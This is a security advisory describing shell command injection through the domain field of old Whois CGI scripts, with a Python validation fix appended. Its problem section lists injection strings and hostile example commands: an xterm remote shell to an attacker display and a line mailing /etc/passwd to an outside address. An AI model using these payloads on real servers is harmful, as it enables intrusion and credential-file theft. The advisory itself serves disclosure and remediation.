COMMAND

    Whois CGI

SYSTEMS AFFECTED

    Whois Internic Lookup v1.0, CC Whois v1.0, Matt's Whois v1

PROBLEM

    The following is based on the hhp advisory.  The versions listed
    above allow execution of arbitrary commands because the domain
    field is handed to a shell without any parsing of shell escape
    characters; the problem is triggered when the domain entry consists
    of one of the following strings.  Note: the exact strings vary
    between vulnerable versions:

        1.) ;commands
        2.) ";commands
        3.) ;commands;

    Example.  If the domain entries consist of:

        1.) ;id
        2.) ";id

    or, alternatively,

        3.) ;id;

    you will see something like this:

        'Whois Server Version 1.1
        
        Domain names in the .com, .net, and .org
        domains  can now be registered with many
        different  competing  registrars.  Go to
        http://www.internic.net for detailed
        information. etc. etc. etc....
        (scroll  to  the  bottom of the output.)
        uid=501(blah) gid=500(blah)'

        ^^^^^\
              ` 'id' was executed on the server.

    Other commands can be run in the same way, for example:

        ;xterm -display ip:0.0 -rv -e /bin/sh
        ";uname -a;whoami;w;ls -al
        ;cat /etc/passwd|mail you@yourdomain.com;
        Etc, Etc.

    A lot of the main *NIC* servers were found running vulnerable versions.

SOLUTION

    If you run one of these bad scripts, delete it and point your
    browser to:

        http://cgi.resourceindex.com/Programs_and_Scripts/Perl/Internet_Utilities/Whois/

    and download one of the secure packages.
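
    As an added illustration (not part of the hhp advisory and not code
    from any of the scripts named above), the Python fragment below shows
    the two controls the vulnerable scripts lacked: an allowlist check on
    the domain field and a lookup that never passes the field through a
    shell.  The 'whois' client name and the label rules are assumptions.

```python
import re
import subprocess

# Allowlist for one DNS label: letters, digits and interior hyphens, 1-63
# chars (assumption: plain hostnames only, no IDN or whois "handle" queries).
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_DOMAIN_RE = re.compile(r"(?:%s\.)+%s" % (_LABEL, _LABEL))


def is_safe_domain(value):
    """Return True only if value looks like a domain name.

    Shell metacharacters (';', '"', '|', '&', '`', '$', whitespace, newlines)
    can never match, so the strings quoted in the advisory are all rejected.
    A leading '-' is rejected too, so the value cannot be taken for an option.
    fullmatch() is used so a trailing newline does not slip past a '$' anchor.
    """
    return len(value) <= 253 and _DOMAIN_RE.fullmatch(value) is not None


def build_whois_argv(value):
    """Validate the field and return an argv list for the whois client.

    Passing a list to subprocess (shell=False) means /bin/sh is never
    involved, so an unexpected character cannot start a second command.
    """
    if not is_safe_domain(value):
        raise ValueError("rejected whois query: %r" % (value,))
    return ["whois", value]   # assumption: a 'whois' client is on PATH


def whois_lookup(value, timeout=15):
    """Run the lookup and return its output as text (needs network access)."""
    proc = subprocess.run(build_whois_argv(value), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


if __name__ == "__main__":
    # Constructed inputs: the three patterns quoted in the advisory plus a
    # normal domain; only the last one is accepted.
    for q in (";id", '";id', ";id;", "internic.net"):
        print("%-14r -> %s" % (q, "accepted" if is_safe_domain(q) else "rejected"))
```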